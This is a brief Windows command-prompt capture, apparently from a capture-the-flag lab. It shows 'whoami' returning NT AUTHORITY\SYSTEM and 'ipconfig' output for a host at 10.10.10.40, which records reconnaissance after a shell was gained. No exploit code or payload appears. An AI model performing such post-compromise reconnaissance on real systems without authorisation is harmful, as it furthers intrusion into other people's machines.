Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::d9ea:9b4b:ca07:c644
   Temporary IPv6 Address. . . . . . : dead:beef::c1a3:4567:bd9d:edd4
   Link-local IPv6 Address . . . . . : fe80::d9ea:9b4b:ca07:c644%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:3982%11
                                       10.10.10.2

Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

C:\Windows\system32>
